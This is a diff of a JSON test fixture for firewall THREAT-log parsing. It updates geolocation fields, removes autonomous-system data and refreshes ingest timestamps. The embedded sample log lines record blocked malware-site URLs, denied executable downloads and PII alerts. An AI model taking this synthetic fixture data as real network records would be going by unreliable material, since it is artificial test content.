@@ -7977,22 +7697,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8079,7 +7794,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079333400Z", + "ingested": "2021-12-14T14:49:56.151600685Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -8104,22 +7819,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -8220,7 +7930,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079339200Z", + "ingested": "2021-12-14T14:49:56.151601034Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -8259,22 +7969,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Netherlands", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8361,7 +8066,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079345100Z", + "ingested": "2021-12-14T14:49:56.151601380Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", 
@@ -8400,22 +8105,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "European Union", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8502,7 +8202,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079350900Z", + "ingested": "2021-12-14T14:49:56.151601720Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", @@ -8527,22 +8227,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -8643,7 +8338,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079356600Z", + "ingested": "2021-12-14T14:49:56.151602093Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", @@ -8668,22 +8363,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8784,7 +8474,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079362800Z", + "ingested": "2021-12-14T14:49:56.151602448Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", 
@@ -8809,22 +8499,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -8925,7 +8610,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079368600Z", + "ingested": "2021-12-14T14:49:56.151602787Z", "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", @@ -8964,22 +8649,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -9066,7 +8746,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079374300Z", + "ingested": "2021-12-14T14:49:56.151603135Z", "original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:17.000-04:00", "timezone": "America/New_York", @@ -9091,22 +8771,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9207,7 +8882,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079396400Z", + "ingested": "2021-12-14T14:49:56.151603477Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", 
@@ -9232,22 +8907,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9348,7 +9018,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079402200Z", + "ingested": "2021-12-14T14:49:56.151603820Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9387,22 +9057,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -9489,7 +9154,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079407900Z", + "ingested": "2021-12-14T14:49:56.151604166Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9528,22 +9193,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9630,7 +9290,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079413500Z", + "ingested": "2021-12-14T14:49:56.151604506Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", 
@@ -9655,22 +9315,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -9771,7 +9426,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079419400Z", + "ingested": "2021-12-14T14:49:56.151604847Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9810,22 +9465,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -9912,7 +9562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079425200Z", + "ingested": "2021-12-14T14:49:56.151605246Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -9937,22 +9587,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10053,7 +9698,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079430400Z", + "ingested": "2021-12-14T14:49:56.151605612Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", 
@@ -10092,22 +9737,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10194,7 +9834,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079433800Z", + "ingested": "2021-12-14T14:49:56.151606018Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -10233,22 +9873,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Ukraine", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -10335,7 +9970,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079438200Z", + "ingested": "2021-12-14T14:49:56.151606374Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -10374,22 +10009,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10476,7 +10106,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079443200Z", + "ingested": "2021-12-14T14:49:56.151606724Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", 
@@ -10515,22 +10145,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10617,7 +10242,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079448300Z", + "ingested": "2021-12-14T14:49:56.151607186Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -10656,22 +10281,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -10758,7 +10378,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079452200Z", + "ingested": "2021-12-14T14:49:56.151607531Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -10797,22 +10417,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10899,7 +10514,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079456700Z", + "ingested": "2021-12-14T14:49:56.151607886Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", 
@@ -10924,22 +10539,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11040,7 +10650,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079460900Z", + "ingested": "2021-12-14T14:49:56.151608257Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11079,22 +10689,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -11181,7 +10786,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079464700Z", + "ingested": "2021-12-14T14:49:56.151608603Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11220,22 +10825,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11322,7 +10922,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079468600Z", + "ingested": "2021-12-14T14:49:56.151608957Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", 
@@ -11361,22 +10961,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11463,7 +11058,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079472Z", + "ingested": "2021-12-14T14:49:56.151609297Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11502,22 +11097,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
